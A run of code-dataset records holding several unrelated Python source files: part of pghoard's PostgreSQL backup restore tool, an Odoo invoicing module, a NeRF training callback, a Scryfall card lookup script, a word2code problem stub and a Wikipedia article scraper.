tarinfo.isdir():\n directories.append([target_name, tarinfo])\n compat.makedirs(target_name, exist_ok=True)\n elif tarinfo.isreg():\n target_dir = os.path.dirname(target_name)\n if not os.path.exists(target_dir):\n compat.makedirs(target_dir, exist_ok=True)\n tar.makefile(tarinfo, target_name)\n tar.chmod(tarinfo, target_name)\n tar.utime(tarinfo, target_name)\n elif tarinfo.issym():\n os.symlink(tarinfo.linkname, target_name)\n else:\n raise Exception(\"Unrecognized file type for file {!r} in tar\".format(tarinfo.name))\n\n for target_name, tarinfo in directories:\n tar.chmod(tarinfo, target_name)\n tar.utime(tarinfo, target_name)\n\n def _extract_basic(self, fileobj, pgdata):\n # | in mode to use tarfile's internal stream buffer manager, currently required because our SnappyFile\n # interface doesn't do proper buffering for reads\n with tarfile.open(fileobj=fileobj, mode=\"r|\", bufsize=IO_BLOCK_SIZE) as tar:\n tar.extractall(pgdata)\n\n def _get_basebackup(self, pgdata, basebackup, site,\n primary_conninfo=None,\n recovery_end_command=None,\n recovery_target_action=None,\n recovery_target_name=None,\n recovery_target_time=None,\n recovery_target_xid=None,\n restore_to_master=None,\n overwrite=False,\n tablespace_mapping=None):\n targets = [recovery_target_name, recovery_target_time, recovery_target_xid]\n if sum(0 if flag is None else 1 for flag in targets) > 1:\n raise RestoreError(\"Specify at most one of recovery_target_name, \"\n \"recovery_target_time or recovery_target_xid\")\n\n # If basebackup that we want it set as latest, figure out which one it is\n if recovery_target_time:\n try:\n recovery_target_time = dates.parse_timestamp(recovery_target_time)\n except (TypeError, ValueError) as ex:\n raise RestoreError(\"recovery_target_time {!r}: {}\".format(recovery_target_time, ex))\n basebackup = self._find_nearest_basebackup(recovery_target_time)\n elif basebackup == \"latest\":\n basebackup = self._find_nearest_basebackup()\n\n # Grab basebackup metadata to make sure it exists and to look up tablespace requirements\n metadata = self.storage.get_basebackup_metadata(basebackup)\n tablespaces = {}\n\n # Make sure we have a proper place to write the $PGDATA and possible tablespaces\n dirs_to_create = []\n dirs_to_recheck = []\n dirs_to_wipe = []\n\n if not os.path.exists(pgdata):\n dirs_to_create.append(pgdata)\n elif overwrite:\n dirs_to_create.append(pgdata)\n dirs_to_wipe.append(pgdata)\n elif os.listdir(pgdata) in ([], [\"lost+found\"]):\n # Allow empty directories as well as ext3/4 mount points to be used, but check that we can write to them\n dirs_to_recheck.append([\"$PGDATA\", pgdata])\n else:\n raise RestoreError(\"$PGDATA target directory {!r} exists, is not empty and --overwrite not specified, aborting.\"\n .format(pgdata))\n\n if metadata.get(\"format\") == \"pghoard-bb-v2\":\n # \"Backup file\" is a metadata object, fetch it to get more information\n bmeta_compressed = self.storage.get_file_bytes(basebackup)\n with rohmufile.file_reader(fileobj=io.BytesIO(bmeta_compressed), metadata=metadata,\n key_lookup=config.key_lookup_for_site(self.config, site)) as input_obj:\n bmeta = common.extract_pghoard_bb_v2_metadata(input_obj)\n self.log.debug(\"Backup metadata: %r\", bmeta)\n\n tablespaces = bmeta[\"tablespaces\"]\n basebackup_data_files = [\n [\n os.path.join(self.config[\"backup_sites\"][site][\"prefix\"], \"basebackup_chunk\", chunk[\"chunk_filename\"]),\n chunk[\"result_size\"],\n ]\n for chunk in bmeta[\"chunks\"]\n ]\n # We need the files from the main basebackup file too\n basebackup_data_files.append([(io.BytesIO(bmeta_compressed), metadata), 0])\n\n elif metadata.get(\"format\") == \"pghoard-bb-v1\":\n # Tablespace information stored in object store metadata, look it up\n tsmetare = re.compile(\"^tablespace-name-([0-9]+)$\")\n for kw, value in metadata.items():\n match = tsmetare.match(kw)\n if not match:\n continue\n tsoid = match.group(1)\n tsname = value\n tspath = metadata[\"tablespace-path-{}\".format(tsoid)]\n tablespaces[tsname] = {\n \"oid\": int(tsoid),\n \"path\": tspath,\n }\n\n basebackup_data_files = [[basebackup, -1]]\n\n else:\n # Object is a raw (encrypted, compressed) basebackup\n basebackup_data_files = [[basebackup, -1]]\n\n # Map tablespaces as requested and make sure the directories exist\n for tsname, tsinfo in tablespaces.items():\n tspath = tablespace_mapping.pop(tsname, tsinfo[\"path\"])\n if not os.path.exists(tspath):\n raise RestoreError(\"Tablespace {!r} target directory {!r} does not exist, aborting.\"\n .format(tsname, tspath))\n if os.listdir(tspath) not in ([], [\"lost+found\"]):\n # Allow empty directories as well as ext3/4 mount points to be used, but check that we can write to them\n raise RestoreError(\"Tablespace {!r} target directory {!r} exists but is not empty, aborting.\"\n .format(tsname, tspath))\n\n tsinfo[\"path\"] = tspath\n print(\"Using existing empty directory {!r} for tablespace {!r}\".format(tspath, tsname))\n dirs_to_recheck.append([\"Tablespace {!r}\".format(tsname), tspath])\n\n # We .pop() the elements of tablespace_mapping above - if mappings are given they must all exist or the\n # user probably made a typo with tablespace names, abort in that case.\n if tablespace_mapping:\n raise RestoreError(\"Tablespace mapping for {} was requested, but the tablespaces are not present in the backup\"\n .format(sorted(tablespace_mapping)))\n\n # First check that the existing (empty) directories are writable, then possibly wipe any directories as\n # requested by --overwrite and finally create the new dirs\n for diruse, dirname in dirs_to_recheck:\n try:\n tempfile.TemporaryFile(dir=dirname).close()\n except PermissionError:\n raise RestoreError(\"{} target directory {!r} is empty, but not writable, aborting.\"\n .format(diruse, dirname))\n\n for dirname in dirs_to_wipe:\n shutil.rmtree(dirname)\n for dirname in dirs_to_create:\n os.makedirs(dirname)\n os.chmod(dirname, 0o700)\n\n total_download_size = sum(item[1] for item in basebackup_data_files)\n progress_report_time = [0]\n errors = 0\n jobs = []\n with futures.ThreadPoolExecutor(max_workers=self.config[\"transfer\"][\"thread_count\"]) as executor:\n download_progress_per_file = {\n basebackup_data_file: 0\n for basebackup_data_file, _ in basebackup_data_files\n if not isinstance(basebackup_data_file, tuple)\n }\n\n def download_progress(end=\"\"):\n # report max once per second\n if time.monotonic() - progress_report_time[0] < 1:\n return\n progress_report_time[0] = time.monotonic()\n\n total_downloaded = sum(download_progress_per_file.values())\n if total_download_size <= 0:\n progress = 0\n else:\n progress = total_downloaded / total_download_size\n print(\"\\rDownload progress: {progress:.2%} ({dl_mib:.0f} / {total_mib:.0f} MiB)\\r\".format(\n progress=progress,\n dl_mib=total_downloaded / (1024 ** 2),\n total_mib=total_download_size / (1024 ** 2),\n ), end=end)\n\n for basebackup_data_file, backup_data_file_size in basebackup_data_files:\n def single_download_progress(current_pos, expected_max,\n this_file_name=basebackup_data_file,\n this_file_size=backup_data_file_size):\n download_progress_per_file[this_file_name] = this_file_size * (current_pos / expected_max)\n download_progress()\n\n # NOTE: Most of the transfer clients aren't thread-safe, so initialize a new transfer\n # client for each download. We could use thread local storage or pooling here, but\n # probably not worth the trouble for this use case.\n transfer = get_transfer(common.get_object_storage_config(self.config, site))\n jobs.append(executor.submit(\n self.process_one_chunk,\n basebackup_data_file=basebackup_data_file,\n progress_callback=single_download_progress,\n site=site,\n transfer=transfer,\n pgdata=pgdata,\n tablespaces=tablespaces,\n ))\n\n for future in futures.as_completed(jobs):\n if future.exception():\n self.log.error(\"Got error from chunk download: %s\", future.exception())\n errors += 1\n continue\n\n progress_report_time[0] = 0\n download_progress(end=\"\\n\")\n\n if errors:\n raise RestoreError(\"Backup download/extraction failed with {} errors\".format(errors))\n\n create_recovery_conf(\n dirpath=pgdata,\n site=site,\n port=self.config[\"http_port\"],\n primary_conninfo=primary_conninfo,\n recovery_end_command=recovery_end_command,\n recovery_target_action=recovery_target_action,\n recovery_target_name=recovery_target_name,\n recovery_target_time=recovery_target_time,\n recovery_target_xid=recovery_target_xid,\n restore_to_master=restore_to_master,\n )\n\n print(\"Basebackup restoration complete.\")\n print(\"You can start PostgreSQL by running pg_ctl -D %s start\" % pgdata)\n print(\"On systemd based systems you can run systemctl start postgresql\")\n print(\"On SYSV Init based systems you can run /etc/init.d/postgresql start\")\n\n def process_one_chunk(self, *, transfer, basebackup_data_file, progress_callback, site, pgdata, tablespaces):\n self.log.debug(\"Processing one chunk: %r\", basebackup_data_file)\n if isinstance(basebackup_data_file, tuple):\n tmp, metadata = basebackup_data_file\n else:\n tmp, metadata = self.download_one_backup(\n transfer=transfer,\n basebackup_data_file=basebackup_data_file,\n progress_callback=progress_callback,\n site=site\n )\n\n self.extract_one_backup(\n obj=tmp,\n metadata=metadata,\n pgdata=pgdata,\n site=site,\n tablespaces=tablespaces,\n )\n\n def download_one_backup(self, *, transfer, basebackup_data_file, progress_callback, site):\n dl_dir = os.path.join(\n self.config[\"backup_location\"],\n self.config[\"backup_sites\"][site][\"prefix\"],\n \"basebackup_incoming\",\n )\n compat.makedirs(dl_dir, exist_ok=True)\n tmp = tempfile.NamedTemporaryFile(dir=dl_dir, prefix=\"basebackup.\", suffix=\".pghoard\")\n try:\n metadata = transfer.get_contents_to_fileobj(\n key=basebackup_data_file,\n fileobj_to_store_to=tmp,\n progress_callback=progress_callback)\n progress_callback(1, 1)\n self.log.info(\"Downloaded %r\", basebackup_data_file)\n tmp.seek(0)\n except: # pylint: disable=bare-except\n self.log.exception(\"Problem downloading a backup file: %r\", basebackup_data_file)\n tmp.close()\n raise\n return tmp, metadata\n\n def extract_one_backup(self, *, obj, metadata, pgdata, site, tablespaces):\n with obj:\n with rohmufile.file_reader(fileobj=obj, metadata=metadata,\n key_lookup=config.key_lookup_for_site(self.config, site)) as input_obj:\n if metadata.get(\"format\") in (\"pghoard-bb-v1\", \"pghoard-bb-v2\"):\n self._extract_pghoard_bb_v1_v2(input_obj, pgdata, tablespaces)\n elif not metadata.get(\"format\"):\n self._extract_basic(input_obj, pgdata)\n else:\n raise RestoreError(\"Unrecognized basebackup format {!r}\".format(metadata.get(\"format\")))\n self.log.info(\"Extracted %r %r\", obj, metadata)\n\n def run(self, args=None):\n parser = self.create_parser()\n args = parser.parse_args(args)\n logutil.configure_logging(level=logging.DEBUG if args.debug else logging.INFO)\n if not hasattr(args, \"func\"):\n parser.print_help()\n return 1\n try:\n exit_code = args.func(args)\n return exit_code\n except KeyboardInterrupt:\n print(\"*** interrupted by keyboard ***\")\n return 1\n\n\nclass ObjectStore:\n def __init__(self, storage, prefix, site, pgdata):\n self.storage = storage\n self.prefix = prefix\n self.site = site\n self.pgdata = pgdata\n self.log = logging.getLogger(self.__class__.__name__)\n\n def list_basebackups(self):\n return self.storage.list_path(os.path.join(self.prefix, \"basebackup\"))\n\n def show_basebackup_list(self, verbose=True):\n result = self.list_basebackups()\n caption = \"Available %r basebackups:\" % self.site\n print_basebackup_list(result, caption=caption, verbose=verbose)\n\n def get_basebackup_metadata(self, basebackup):\n return self.storage.get_metadata_for_key(basebackup)\n\n def get_basebackup_file_to_fileobj(self, basebackup, fileobj, *, progress_callback=None):\n return self.storage.get_contents_to_fileobj(basebackup, fileobj, progress_callback=progress_callback)\n\n def get_file_bytes(self, name):\n return self.storage.get_contents_to_string(name)[0]\n\n\nclass HTTPRestore(ObjectStore):\n def __init__(self, host, port, site, pgdata=None):\n super().__init__(storage=None, prefix=None, site=site, pgdata=pgdata)\n self.host = host\n self.port = port\n self.session = Session()\n\n def _url(self, path):\n return \"http://{host}:{port}/{site}/{path}\".format(\n host=self.host,\n port=self.port,\n site=self.site,\n path=path)\n\n def list_basebackups(self):\n response = self.session.get(self._url(\"basebackup\"))\n return response.json()[\"basebackups\"]\n\n\ndef main():\n try:\n restore = Restore()\n return restore.run()\n except (InvalidConfigurationError, RestoreError) as ex:\n print(\"FATAL: {}: {}\".format(ex.__class__.__name__, ex))\n return 1\n\n\nif __name__ == \"__main__\":\n sys.exit(main() or 0)\n","repo_name":"Clarivate-LSPS/pghoard","sub_path":"pghoard/restore.py","file_name":"restore.py","file_ext":"py","file_size_in_byte":29200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"20136276044","text":"from problem_utils import *\n\nclass TaroGrid:\n def getNumber(self, grid):\n input_array = grid\n # Cat Taro has a square grid with N rows and N columns.\n # Each cell of the grid is painted either black or white.\n # You are given a String[] grid which represents the current state of the grid.\n # Each element of grid represents one row of the grid.\n # In grid , the character 'W' represents a white cell, and the character 'B' represents a black cell.\n # Taro wants to choose a set of consecutive cells that are in the same column and are painted in the same color.\n # ROOT-0(root=wants-2(nsubj=Taro-1, xcomp=choose-4(aux=to-3, dobj=set-6(det=a-5, prep_of=cells-9(amod=consecutive-8), rcmod=are-11(nsubj=that-10, prep_in=column-15(det=the-13, amod=same-14)))), conj_and=painted-18(auxpass=are-17, prep_in=color-22(det=the-20, amod=same-21))))\n choose(set(cells(consecutive), column(same), color(same)))\n # Return the largest number of cells he can choose.\n # ROOT-0(root=choose-9(dep=Return-1(dobj=number-4(det=the-2, amod=largest-3, prep_of=cells-6)), nsubj=he-7, aux=can-8))\n return(largest(number(cells)))\n\n\n\ndef example0():\n\tcls = TaroGrid()\n\tinput0 = [\"W\"]\n\treturns = 1\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example1():\n\tcls = TaroGrid()\n\tinput0 = [\"WB\", \"BW\"]\n\treturns = 1\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example2():\n\tcls = TaroGrid()\n\tinput0 = [\"BWW\", \"BBB\", \"BWB\"]\n\treturns = 3\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example3():\n\tcls = TaroGrid()\n\tinput0 = [\"BWBW\", \"BBWB\", \"WWWB\", \"BWWW\"]\n\treturns = 3\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example4():\n\tcls = TaroGrid()\n\tinput0 = [\"BWB\", \"BBW\", \"BWB\"]\n\treturns = 3\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example5():\n\tcls = TaroGrid()\n\tinput0 = [\"BBWWBBWW\", \"BBWWBBWW\", \"WWBBWWBB\", \"WWBBWWBB\", \"BBWWBBWW\", \"BBWWBBWW\", \"WWBBWWBB\", \"WWBBWWBB\"]\n\treturns = 2\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\n\nif __name__ == '__main__':\n\tprint(example0())","repo_name":"jvalansi/word2code","sub_path":"word2code/res/translations/TaroGrid.py","file_name":"TaroGrid.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21739852206","text":"from openerp.addons.at_base import util\nfrom openerp.addons.at_base import format\nfrom openerp.tools.translate import _\nfrom openerp.osv import osv\nimport time\n\n\nclass account_analytic_line(osv.Model):\n\n def _prepare_cost_invoice(self, cr, uid, partner, company_id, currency_id, analytic_lines, context=None):\n res = super(account_analytic_line, self)._prepare_cost_invoice(cr, uid, partner, company_id, currency_id, analytic_lines, context=context)\n \n line_ids = [l.id for l in analytic_lines]\n account = analytic_lines[0].account_id\n f = format.LangFormat(cr, uid, context)\n \n cr.execute(\"SELECT MIN(line.date), MAX(line.date) \" \\\n \"FROM account_analytic_line as line \" \\\n \"WHERE account_id = %s \" \\\n \"AND id IN %s AND to_invoice IS NOT NULL\", (account.id, tuple(line_ids)))\n\n invoice_name = None\n for date_from, date_to in cr.fetchall():\n if date_from and date_to:\n invoice_name = \"%s %s - %s\" % ( account.name or \"\",f.formatLang(date_from,date=True), f.formatLang(date_to,date=True))\n\n if not invoice_name:\n invoice_name = \"%s %s\" % (account.name or \"\",f.formatLang(util.currentDate(),date=True))\n\n res[\"name\"] = invoice_name\n return res\n \n def _prepare_cost_invoice_line(self, cr, uid, invoice_id, product_id, uom, user_id,\n factor_id, account, analytic_lines, journal_type, data, context=None):\n product_obj = self.pool['product.product']\n \n f = format.LangFormat(cr, uid, context)\n uom_context = dict(context or {}, uom=uom)\n \n total_price = sum(l.amount for l in analytic_lines)\n total_qty = sum(l.unit_amount for l in analytic_lines)\n\n if data.get('product'):\n # force product, use its public price\n if isinstance(data['product'], (tuple, list)):\n product_id = data['product'][0]\n else:\n product_id = data['product']\n unit_price = self._get_invoice_price(cr, uid, account, product_id, user_id, total_qty, uom_context)\n elif journal_type == 'general' and product_id:\n # timesheets, use sale price\n unit_price = self._get_invoice_price(cr, uid, account, product_id, user_id, total_qty, uom_context)\n else:\n # expenses, using price from amount field\n unit_price = total_price*-1.0 / total_qty\n\n factor = self.pool['hr_timesheet_invoice.factor'].browse(cr, uid, factor_id, context=uom_context)\n factor_name = factor.customer_name or ''\n curr_invoice_line = {\n 'price_unit': unit_price,\n 'quantity': total_qty,\n 'product_id': product_id,\n 'discount': factor.factor,\n 'invoice_id': invoice_id,\n 'name': factor_name,\n 'uos_id': uom,\n 'account_analytic_id': account.id,\n }\n\n if product_id:\n product = product_obj.browse(cr, uid, product_id, context=uom_context)\n factor_name = product_obj.name_get(cr, uid, [product_id], context=uom_context)[0][1]\n if factor.customer_name:\n factor_name += ' - ' + factor.customer_name\n\n general_account = product.property_account_income or product.categ_id.property_account_income_categ\n if not general_account:\n raise osv.except_osv(_('Error!'), _(\"Configuration Error!\") + '\\n' + _(\"Please define income account for product '%s'.\") % product.name)\n taxes = product.taxes_id or general_account.tax_ids\n tax = self.pool['account.fiscal.position'].map_tax(cr, uid, account.partner_id.property_account_position, taxes)\n curr_invoice_line.update({\n 'invoice_line_tax_id': [(6, 0, tax)],\n 'name': factor_name,\n 'invoice_line_tax_id': [(6, 0, tax)],\n 'account_id': general_account.id,\n })\n\n note = []\n for line in analytic_lines:\n # set invoice_line_note\n details = []\n if data.get('date', False):\n details.append(f.formatLang(line['date'],date=True))\n if data.get('time', False):\n line_time = f.formatLang(line.unit_amount,float_time=True)\n if line['product_uom_id']:\n details.append(\"%s %s\" % (line_time, line.product_uom_id.name))\n else:\n details.append(\"%s\" % (line_time, ))\n if data.get('name', False):\n details.append(line['name'])\n if details:\n note.append(u' - '.join(map(lambda x: unicode(x) or '', details)))\n if note:\n curr_invoice_line['name'] += \"\\n\" + (\"\\n\".join(map(lambda x: unicode(x) or '', note)))\n return curr_invoice_line\n \n \n _inherit = \"account.analytic.line\"\n","repo_name":"funkring/fdoo","sub_path":"addons-funkring/at_hr/hr_timesheet_invoice.py","file_name":"hr_timesheet_invoice.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73102749924","text":"from pathlib import Path\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nTEST_PATH = Path(\"/home/jperl/Developer/tutorials/pyimagesearch-nerf-tutorial\")\n\ndef get_train_monitor(test_ds, encoder_fn, l_xyz, l_dir, image_path):\n # get images and rays from testing dataset\n (t_elements, t_images) = next(iter(test_ds))\n (t_ray_origins_coarse, t_ray_dirs_coarse, t_vals_coarse) = t_elements\n\n # build the test coarse rays\n t_rays_coarse = t_ray_origins_coarse[..., None, :] + (t_ray_dirs_coarse[..., None, :] * t_vals_coarse[..., None])\n\n # positionally encode the rays and direction vectors for the coars rays\n t_rays_coarse = encoder_fn(t_rays_coarse, l_xyz)\n t_dirs_coarse_shape = tf.shape(t_rays_coarse[..., :3])\n t_ray_dirs_coarse = tf.broadcast_to(t_ray_dirs_coarse[..., None, :], shape=t_dirs_coarse_shape)\n t_dirs_coarse = encoder_fn(t_dirs_coarse, l_dir)\n\n class TrainMonitor(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n # compute the coarse model prediction\n (t_rgb_coarse, t_sigma_coarse) = self.model.coarse_model.predict([t_rays_coarse, t_dirs_coarse])\n \n # render the image rom the model prediction\n t_render_coarse = self.model.render_img_depth(rgb=t_rgb_coarse, sigma=t_sigma_coarse, t_vals=t_vals_coarse)\n (t_img_coarse, _, t_weights_coarse) = t_render_coarse\n\n # compute the middle values of t_vals\n t_vals_coarse_mid = 0.5 * (t_vals_coarse[..., 1:] + t_vals_coarse[..., :-1])\n\n # apply hierarchical sampling and get the t_vals for the fine model\n t_vals_fine = self.model.sample_pdf(t_vals_mid=t_vals_coarse_mid, weights=t_weights_coarse, n_fine=self.model.n_fine_samples)\n t_vals_fine = tf.sort(tf.concat([t_vals_coarse, t_vals_fine], axis=-1), axis=-1)\n\n # build the fine rays and positionally encode them\n t_rays_fine = t_ray_origins_coarse[..., None, :] + (t_ray_dirs_coarse[..., None, :] * t_vals_fine[..., None])\n t_rays_fine = self.model.encode_fn(t_rays_fine, l_xyz)\n\n # build the fine directions and positionally encode them\n t_dirs_fine_shape = tf.shape(t_rays_fine[..., :3])\n t_dirs_fine = tf.broadcast_to(t_ray_dirs_coarse[..., None, :], shape=t_dirs_fine_shape)\n t_dirs_fine = self.model.encode_fn(t_dirs_fine, l_dir)\n\n # compute the fine model prediction\n t_rgb_fine, t_sigma_fine = self.model.fine_model.predict([t_rays_fine, t_dirs_fine])\n\n # render the image from the model prediction\n t_render_fine = self.model.render_img_depth(rgb=t_rgb_fine, sigma=t_sigma_fine, t_vals=t_vals_fine)\n (t_img_fine, t_depth_fine, _) = t_render_fine\n\n # plot the coarse image, fine image, fine depth map and target image\n (fig, ax) = plt.subplots(nrows=1, ncols=4, figsize=(10, 10))\n\n coarse_img = tf.keras.preprocessing.image.array_to_img(t_img_coarse[0])\n tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-coarse.png\", coarse_img)\n \n fine_img = tf.keras.preprocessing.image.array_to_img(t_img_fine[0])\n tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-fine.png\", coarse_img)\n\n depth_img = tf.keras.preprocessing.image.array_to_img(t_depth_fine[0])\n tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-depth-fine.png\", depth_img)\n\n real_img = tf.keras.preprocessing.image.array_to_img(t_images[0])\n tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-real.png\", real_img)\n\n plt.close()\n \n # instantiate train monitor callback\n return TrainMonitor()\n","repo_name":"JamesPerlman/pis-nerf-tut","sub_path":"src/training_monitor.py","file_name":"training_monitor.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27318387748","text":"import json\r\nimport requests\r\n\r\nurl = \"https://api.scryfall.com\"\r\ncards = url + \"/cards\"\r\n\r\ndata = requests.get(cards).json()\r\n\r\ni = 0\r\n\r\ndef Create_dict():\r\n Card_dict = {}\r\n\r\n while data[\"has_more\"]:\r\n\r\n for element in data[\"data\"]: #write keys in Card list\r\n name = element[\"name\"]\r\n Card_dict[\"name\"] = element\r\n\r\n if not data[\"has_more\"] == false: #Turn Page\r\n data = requests.get(cards[\"next_page\"])\r\n\r\n\r\n else:\r\n with open(\"DATA\", \"w\") as fo:\r\n json.dump(Card_dict, fo)\r\n break\r\n\r\n\r\ndef card_request():\r\n Card_dict = json.load(open(\"DATA\"))\r\n while true:\r\n cardname = input(\"Enter your cardname\")\r\n\r\n if \"cardname\" in Card_dict.keys(): #zugriff auf img\r\n print(Card_dict[\"cardname\"][\"image_uris\"][\"png\"])\r\n break\r\n else:\r\n print(\"did you mean Terminus ?\")\r\n print(Card_dict[\"Terminus\"][\"image_uris\"][\"png\"])\r\n\r\n\r\n\r\n","repo_name":"Dakuso/Telebot","sub_path":"Telegram_Bot/Teleboy.py","file_name":"Teleboy.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74791971044","text":"def subset_sum(arr,n,sum):\r\n T=[[-1 for i in range(sum+1)] for j in range(n+1)]\r\n for i in range(n+1):\r\n for j in range(sum+1):\r\n if i==0 or j!=0:\r\n T[i][j]=False\r\n elif j==0:\r\n T[i][j]=True\r\n for i in range(1,n+1):\r\n for j in range(1,sum+1):\r\n if i-1>=0:\r\n if arr[i-1]<=j:\r\n T[i][j]=T[i-1][j] or T[i-1][j-arr[i-1]]\r\n else:\r\n T[i][j]=T[i-1][j]\r\n return T\r\n\r\n\r\ndef minm_subset_sum_diff(arr,n):\r\n max=-99999\r\n sum=0\r\n for i in arr:\r\n sum+=i\r\n T=subset_sum(arr,n,sum)\r\n temp=T[n]\r\n for i in range((sum//2)+1):\r\n if temp[i]==True:\r\n if max str:\n \"\"\"Extracts text from a list of sections and its subsections recursively.\n\n Parameters\n ----------\n unnecessary_sections : list\n List of strings with skippable sections\n sections : list\n List of sections of a Wikipedia article\n level : int, optional\n Current level, by default 0\n\n Returns\n -------\n str\n Combined sections but without the unnecessary sections\n \"\"\"\n extracted_text = \"\"\n for section in sections:\n if section.title not in unnecessary_sections:\n extracted_text += section.text\n extracted_text += extracting_section(\n unnecessary_sections, section.sections, level + 1\n )\n return extracted_text\n\n\ndef generate_categories(\n wikipedia: wikipediaapi.Wikipedia,\n categories: dict,\n unnecessary_sections: list,\n max_articles: int = 200,\n min_article_length: int = 0,\n max_article_length: int = 10000,\n) -> dict:\n \"\"\"Iterates over a dictionary of Wikipedia categories and extracts articles per category until\n the max_articles parameter is reached. Each article has to contain at least 100 words or\n symbols and articles which contain more than 2000 words or symbols will be shortened.\n The name of the category, the shortened article and the length of the article are saved in\n a dictionary which is linked with the articles title.\n\n Parameters\n ----------\n wikipedia : wikipediaapi.Wikipedia\n Wikipedia class from the `wikipediaapi` module\n categories : dict\n Wikipedia category names with lists of subcategories as values\n unnecessary_sections : list\n List of strings with skippable sections\n max_articles : int, optional\n The maximum of articles per category, by default 200\n min_article_length : int, optional\n The minimum of characters for an article, by default 0\n max_article_length : int, optional\n The maximum of characters for an article, by default 10000\n\n Returns\n -------\n dict\n Article titles with a dictionary with the keys \"category\", \"text\" and \"length\" as value.\n \"\"\"\n\n articles = {}\n\n for idx, (category_name, subcategories) in enumerate(categories.items()):\n article_counter = 0\n\n for subcategory in subcategories:\n if article_counter >= max_articles:\n break\n category = wikipedia.page(subcategory)\n\n for article in tqdm(\n category.categorymembers.values(), desc=\"Iterating over articles\"\n ):\n if article_counter >= max_articles:\n break\n # articles which aren't real articles but a list of articles will be skipped\n if article.ns == 0 and (\n \"Liste von\" not in article.title and \"Liste d\" not in article.title\n ):\n article_dict = get_article(\n wikipedia,\n article,\n category_name,\n unnecessary_sections,\n min_article_length=min_article_length,\n max_article_length=max_article_length,\n )\n if article_dict:\n articles[article.title] = article_dict\n article_counter += 1\n\n log_info = f\"{idx+1} of {len(categories)} categories loaded.\"\n logging.info(f\"\\n\\n{len(log_info)*'-'}\\n{log_info}\\n{len(log_info)*'-'}\")\n return articles\n\n\ndef get_article(\n wikipedia: wikipediaapi.Wikipedia,\n article: wikipediaapi.WikipediaPage,\n category: str,\n unnecessary_sections: list,\n min_article_length: int = 0,\n max_article_length: int = 10000,\n) -> dict:\n \"\"\"Creates a dictionary with the title of the article as key and a dictionary with the keys\n \"category\", \"text\" and \"length\" as value.\n\n Example\n -------\n >>> get_article(wikipedia, 'Altersrente (id: ??, ns: 0)', 'Kategorie:Wirtschaft',\n ['Literatur', 'Weblinks', 'Einzelnachweis', 'Einzelnachweise', 'Siehe auch'])\n {\"Altersrente\":{category:\"Kategorie:Wirtschaft\", text:\"...\", len:1812}}\n\n Parameters\n ----------\n wikipedia : wikipediaapi.Wikipedia\n Wikipedia class from the `wikipediaapi` module\n article : wikipediaapi.WikipediaPage\n Page of the wikipedia article\n category : str\n Category of the article\n unnecessary_sections : list\n unnecessary_sections : list\n List of strings with skippable sections\n min_article_length : int, optional\n The minimum of characters for an article, by default 0\n max_article_length : int, optional\n The maximum of characters for an article, by default 10000\n\n Returns\n -------\n dict\n Article titles with a dictionary with the keys \"category\", \"text\" and \"length\" as value.\n \"\"\"\n article_dict = {}\n\n # no anchored section articles in other articles\n if article.exists():\n reduced_article = article.summary + extracting_section(\n unnecessary_sections, article.sections\n )\n reduced_article = reduced_article[min_article_length:max_article_length]\n\n if reduced_article:\n article_dict[\"category\"] = category\n article_dict[\"text\"] = reduced_article\n article_dict[\"length\"] = len(reduced_article)\n\n return article_dict\n\n\ndef parse_arguments():\n \"\"\"Initialize argument parser and return arguments.\"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"wikiscraper\",\n description=\"Tool to create a corpus of Wikipedia articles based on Wikipedia categories.\",\n )\n parser.add_argument(\n \"path\",\n type=str,\n help=\"Path to the JSON-File which contains the dictionary of the Wikipedia categories.\",\n )\n parser.add_argument(\n \"--lang\", \"-l\", type=str, default=\"de\", help=\"ISO2 lang string (default: 'de').\"\n )\n parser.add_argument(\n \"--max_articles\",\n \"-ma\",\n type=int,\n default=1000,\n help=\"Sets the maximum of articles per category (default: 1000).\",\n )\n parser.add_argument(\n \"--max_article_length\",\n \"-max\",\n type=int,\n default=10000,\n help=\"Maximum size of the article by characters (default: 10000).\",\n )\n parser.add_argument(\n \"--min_article_length\",\n \"-min\",\n type=int,\n default=0,\n help=\"Minimum size of the article by characters (default: 0).\",\n )\n parser.add_argument(\n \"--output_format\",\n \"-of\",\n type=str,\n choices=[\"csv\", \"json\"],\n default=\"json\",\n help=\"Format for the output (default: 'json').\",\n )\n\n return parser.parse_args()\n\n\ndef main(args):\n\n start_time = time.time()\n\n wikipediaapi.log.setLevel(level=wikipediaapi.logging.WARNING)\n out_hdlr = wikipediaapi.logging.StreamHandler(sys.stderr)\n out_hdlr.setFormatter(wikipediaapi.logging.Formatter(\"%(asctime)s %(message)s\"))\n out_hdlr.setLevel(wikipediaapi.logging.WARNING)\n wikipediaapi.log.addHandler(out_hdlr)\n\n # script logger\n logging.basicConfig(level=logging.INFO, filename=\"wikiscraper.log\", filemode=\"w\")\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(levelname)s: %(message)s\")\n console.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(console)\n\n with Path(args.path).open(\"r\", encoding=\"utf-8\") as f:\n wikicategories = json.load(f)\n logging.info(f\"Successfully loaded the categories from the 